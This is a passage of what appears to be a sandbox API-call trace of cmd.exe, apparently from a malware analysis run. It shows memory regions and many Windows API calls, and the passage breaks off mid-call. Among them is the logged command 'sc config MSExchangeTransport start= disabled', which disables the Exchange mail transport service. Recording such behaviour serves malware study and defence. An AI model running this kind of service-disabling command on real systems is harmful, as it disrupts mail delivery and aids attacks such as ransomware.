(normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9188 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9189 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9190 start_va = 0x7f380000 end_va = 0x7f47ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f380000" filename = "" Region: id = 9191 start_va = 0x7f4a7000 end_va = 0x7f4a9fff entry_point = 0x0 region_type = private name = "private_0x000000007f4a7000" filename = "" Region: id = 9192 start_va = 0x4420000 end_va = 0x4423fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 9193 start_va = 0x4430000 end_va = 0x4433fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 9194 start_va = 0x4ad0000 end_va = 0x4e06fff entry_point = 0x4ad0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 565 os_tid = 0xb30 [0134.162] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0134.162] __set_app_type (_Type=0x1) [0134.162] __p__fmode () returned 0x77ac4d6c [0134.162] __p__commode () returned 0x77ac5b1c [0134.162] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0134.162] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0134.162] GetCurrentThreadId () returned 0xb30 [0134.162] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb30) returned 0x84 [0134.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.163] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0134.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.165] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.165] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x459fdd0 | out: phkResult=0x459fdd0*=0x0) returned 0x2 [0134.165] VirtualQuery (in: lpAddress=0x459fdd7, lpBuffer=0x459fd88, dwLength=0x1c | out: lpBuffer=0x459fd88*(BaseAddress=0x459f000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.165] VirtualQuery (in: lpAddress=0x44a0000, lpBuffer=0x459fd88, dwLength=0x1c | out: lpBuffer=0x459fd88*(BaseAddress=0x44a0000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.165] VirtualQuery (in: lpAddress=0x44a1000, lpBuffer=0x459fd88, dwLength=0x1c | out: lpBuffer=0x459fd88*(BaseAddress=0x44a1000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.165] VirtualQuery (in: lpAddress=0x44a3000, lpBuffer=0x459fd88, dwLength=0x1c | out: lpBuffer=0x459fd88*(BaseAddress=0x44a3000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.165] VirtualQuery (in: lpAddress=0x45a0000, lpBuffer=0x459fd88, dwLength=0x1c | out: lpBuffer=0x459fd88*(BaseAddress=0x45a0000, AllocationBase=0x45a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0134.165] GetConsoleOutputCP () returned 0x1b5 [0134.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.166] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0134.166] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.166] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0134.166] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.166] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.166] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.166] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.166] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.166] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.166] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.166] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0134.167] GetEnvironmentStringsW () returned 0x4887da8* [0134.167] FreeEnvironmentStringsA (penv="A") returned 1 [0134.167] GetEnvironmentStringsW () returned 0x4887da8* [0134.167] FreeEnvironmentStringsA (penv="A") returned 1 [0134.167] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459ed34 | out: phkResult=0x459ed34*=0x94) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x0, lpData=0x459ed40*=0xf8, lpcbData=0x459ed3c*=0x1000) returned 0x2 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x1, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x0, lpData=0x459ed40*=0x1, lpcbData=0x459ed3c*=0x1000) returned 0x2 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x0, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x40, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x40, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x0, lpData=0x459ed40*=0x40, lpcbData=0x459ed3c*=0x1000) returned 0x2 [0134.167] RegCloseKey (hKey=0x94) returned 0x0 [0134.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459ed34 | out: phkResult=0x459ed34*=0x94) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x0, lpData=0x459ed40*=0x40, lpcbData=0x459ed3c*=0x1000) returned 0x2 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x1, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x0, lpData=0x459ed40*=0x1, lpcbData=0x459ed3c*=0x1000) returned 0x2 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x0, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.167] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x9, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.168] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x4, lpData=0x459ed40*=0x9, lpcbData=0x459ed3c*=0x4) returned 0x0 [0134.168] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459ed38, lpData=0x459ed40, lpcbData=0x459ed3c*=0x1000 | out: lpType=0x459ed38*=0x0, lpData=0x459ed40*=0x9, lpcbData=0x459ed3c*=0x1000) returned 0x2 [0134.168] RegCloseKey (hKey=0x94) returned 0x0 [0134.168] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29837 [0134.168] srand (_Seed=0x5ad29837) [0134.168] GetCommandLineW () returned="/c sc config MSExchangeTransport start= disabled" [0134.168] GetCommandLineW () returned="/c sc config MSExchangeTransport start= disabled" [0134.168] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.168] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4889d00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0134.168] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.168] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.168] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.168] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.168] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.168] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.168] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.168] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.168] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.168] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.168] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.168] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.168] GetEnvironmentStringsW () returned 0x4887da8* [0134.169] FreeEnvironmentStringsA (penv="A") returned 1 [0134.169] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.169] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.169] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.169] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.169] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.169] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.169] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.169] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.169] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.169] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.169] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x459fb0c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.169] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x459fb0c, lpFilePart=0x459fb04 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459fb04*="Desktop") returned 0x1d [0134.169] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.169] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x459f888 | out: lpFindFileData=0x459f888) returned 0x48805c8 [0134.169] FindClose (in: hFindFile=0x48805c8 | out: hFindFile=0x48805c8) returned 1 [0134.169] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x459f888 | out: lpFindFileData=0x459f888) returned 0x48805c8 [0134.169] FindClose (in: hFindFile=0x48805c8 | out: hFindFile=0x48805c8) returned 1 [0134.169] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0134.169] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x459f888 | out: lpFindFileData=0x459f888) returned 0x48805c8 [0134.169] FindClose (in: hFindFile=0x48805c8 | out: hFindFile=0x48805c8) returned 1 [0134.169] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.170] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0134.170] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0134.170] GetEnvironmentStringsW () returned 0x4887da8* [0134.170] FreeEnvironmentStringsA (penv="=") returned 1 [0134.170] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.170] GetConsoleOutputCP () returned 0x1b5 [0134.170] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.170] GetUserDefaultLCID () returned 0x409 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x459fc3c, cchData=128 | out: lpLCData="0") returned 2 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x459fc3c, cchData=128 | out: lpLCData="0") returned 2 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x459fc3c, cchData=128 | out: lpLCData="1") returned 2 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0134.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0134.171] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.172] GetConsoleTitleW (in: lpConsoleTitle=0x488aa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.172] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0134.172] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0134.172] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0134.172] _wcsicmp (_String1="sc", _String2=")") returned 74 [0134.172] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0134.172] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0134.172] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0134.172] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0134.172] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0134.172] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0134.173] GetConsoleTitleW (in: lpConsoleTitle=0x459f928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.174] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0134.174] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0134.174] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0134.174] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0134.174] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0134.174] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0134.174] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0134.174] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0134.174] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0134.174] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0134.174] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0134.174] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0134.174] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0134.174] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0134.174] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0134.174] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0134.174] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0134.174] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0134.174] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0134.174] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0134.174] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0134.174] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0134.174] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0134.174] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0134.174] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0134.174] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0134.174] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0134.174] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0134.175] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0134.175] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0134.175] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0134.175] _wcsicmp (_String1="sc", _String2="START") returned -17 [0134.175] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0134.175] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0134.175] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0134.175] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0134.175] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0134.175] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0134.175] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0134.175] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0134.175] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0134.175] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0134.175] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0134.175] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0134.175] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0134.175] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0134.175] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0134.175] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0134.175] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0134.175] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0134.175] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0134.175] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0134.175] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0134.175] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0134.175] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0134.175] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0134.175] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0134.175] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0134.175] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0134.175] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0134.175] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0134.175] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0134.175] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0134.175] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0134.175] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0134.175] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0134.175] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0134.175] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0134.175] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0134.175] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0134.175] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0134.175] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0134.175] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0134.175] _wcsicmp (_String1="sc", _String2="START") returned -17 [0134.175] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0134.175] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0134.175] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0134.175] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0134.175] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0134.175] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0134.175] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0134.175] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0134.175] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0134.176] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0134.176] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0134.176] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0134.176] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0134.176] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0134.176] SetErrorMode (uMode=0x0) returned 0x0 [0134.176] SetErrorMode (uMode=0x1) returned 0x0 [0134.176] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x48805d0, lpFilePart=0x459f434 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459f434*="Desktop") returned 0x1d [0134.176] SetErrorMode (uMode=0x0) returned 0x1 [0134.176] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.176] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.184] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.184] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.184] GetConsoleTitleW (in: lpConsoleTitle=0x459f6b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.184] InitializeProcThreadAttributeList (in: lpAttributeList=0x459f5e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x459f5c4 | out: lpAttributeList=0x459f5e0, lpSize=0x459f5c4) returned 1 [0134.184] UpdateProcThreadAttribute (in: lpAttributeList=0x459f5e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x459f5cc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x459f5e0, lpPreviousValue=0x0) returned 1 [0134.184] GetStartupInfoW (in: lpStartupInfo=0x459f618 | out: lpStartupInfo=0x459f618*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.184] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", 